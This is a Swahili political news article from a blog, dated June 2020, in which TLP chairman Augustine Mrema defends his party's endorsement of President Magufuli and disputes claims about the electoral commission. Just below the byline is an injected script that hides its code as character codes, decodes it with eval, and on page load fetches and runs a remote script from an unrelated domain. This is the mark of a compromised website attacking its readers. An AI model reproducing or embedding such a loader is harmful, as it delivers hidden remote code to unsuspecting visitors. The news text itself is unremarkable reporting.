Recent Comments

TLP yalaani wanaoiita CCM ‘B’

By Juma Issihaka Jun 15, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na JUMA ISSIHAKA

CHAMA cha TLP nchini kimelaani hatua ya baadhi ya wanasiasa wanaozua maneno juu ya uamuzi wao wa kumuunga mkono Rais Dk. John Magufuli, katika kugombea urais kwa awamu ya pili mwaka huu, kusisitiza kuwa uamuzi wao ni wa kidemokrasia.

Aidha kimebainisha kigezo cha chama chochote cha siasa nchini kitakachotaka kuungana nao katika kinyang’anyiro cha uchaguzi kwa nafasi za Wabunge na Madiwani lazima kiwe kimetangaza hadharani kuwa kinamuunga mkono Rais Dk. Magufuli katika uchaguzi wa mwaka huu.

Akizungumza na simamia blog ofisini kwake, jijini Dar es Salaam leo Mwenyekiti wa TLP Augustine Mrema, amesema uamuzi huo umeamuliwa na Halmashauri Kuu ya chama hicho wala hakuwa na mtu mmoja hivyo umefuata misngi ya kidemokrasia.

Amesema kigezo kikubwa kilichowashinikiza kuamua hivyo ni utendaji wa rais, umegusa yale waliyoyaandika kwenye ilani yao na kuyatekeleza ipasavyo, hivyo wameona hakuna haja ya kutafuta mwingine ikiwa aliyepo anatekeleza matakwa ya wananchi.

“Baada ya kuona kuwa Rais Dk. Magufuli anafanya kile kilichotarajiwa na wananchi kwa pamoja tumeona anatosha hivyo tukatumia busara na hekima kumuunga mkono, hakuna haja ya kutafuta mwingine,” amesema.

Amesema uamuzi wao huo usitafsiriwe kuwa hawana wanachma wanaotosha kuwania nafasi hiyo bali hawakuona haja ya kutafuta miwngine ikiwa aliyepo anafanya wanachokitaka.

Ameongeza kuwa wanaosema kuwa chama hicho kinatumika na Chama Cha Mapinduzi (CCM) wamekosa adabu kwani TLP ni chama na kina maamuzi yake binafsi.

“Wanaotutukana ni watu wasio na adabu kwani uamuzi ni halali na umefuata misngi ya demokrasia na kwamba wao hawaogopi maneno ya mwanasiasa yeyote katika kufanya maamuzi yao,” amesema.

Kuhusu uchaguzi wa wabunge na Madiwani Mrema amesema wanatashiriki uchaguzi kwa kusaka nafasi hizo kwani wapo baadhi yao wasiotenda vyema katika maeneo yao.

Amesema chama hicho katika kinyang’anyiro cha kuwasaka wabunge na madiwani, hakipo tayari kuungana na chama chochote cha siasa kisichomuunga mkono rais Dk. Magufuli.

“Chama kinachotaka kuungana nasi katika kuwania nafasi za Wabunge na Madiwani lazima kiwe kimetangaza hadharani kuwa kwa mgombea wa nafasi ya Urais kinamuunga mkono Rais Dk. John Magufuli,” amesema.

Mrema amefafanua kuhusu wanasiasa wanaodai tume huru ya Uchaguzi kuwa, ni wachochezi kwani tume hiyo wanayodai kuwa haipo huru ndio iliyowaweka madarakani baadhi ya wanachama wao.

Amesema kama Tume ya Tiafa ya Uchaguzi (NEC) isingekuwa huru na inatenda haki, wanachama wa vyama wa upinzani wasingeshinda nafasi za ubunge na udiwani katika maeneo mbalimbali.

“Simaanishi kwamba tume ni takatifu lakini sio kama inavyosemwa na baadhi ya wanasiasa kuwa haitendi haki ilhali hao wanaolalamika wapo katika nafasi zao wakiwa wametangazwa na tume hiyo hiyo,” amesema.

Mrema amebainisha tathmini yake kuelekea uchaguzi wa mwaka huu ni kwamba Rais Dk. Magufuli, ana kila sababu ya kuibuka mshindi kwa kishindo kutokana na kazi kubwa aliyoifanya awamu ya kwanza.

MREMA HATAKIWI TENA KIBAMBA

Chama cha TLP pia kimetangaza kupokea wanachama 80 kutoka Chama cha Demokrasia na Maendeleo (CHADEMA) jimbo la Kibamba na kuomba Mwenyekiti wa Umoja wa Vijana TLP (UVTLP) Taifa Mhandisi Aivan Maganza, akagombee katika jimbo hilo kutokana na kuchoshwa na utendaji wa Mbunge wao John Mnyika.

Kwa mujibu wa wanachama hao Mnyika amekuwa Mbunge wa jimbo hilo kwa kipindi chote bila kuwafanyia maendeleo yoyote na kwamba Mhandisi Maganza, wamekuwa wakishirikiana nae katika shughuli mbalimbali za maendeleo tangu alipokuwa Rais wa Chuo Kikuu cha St. Joseph kilichopo jimboni humo.

 

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.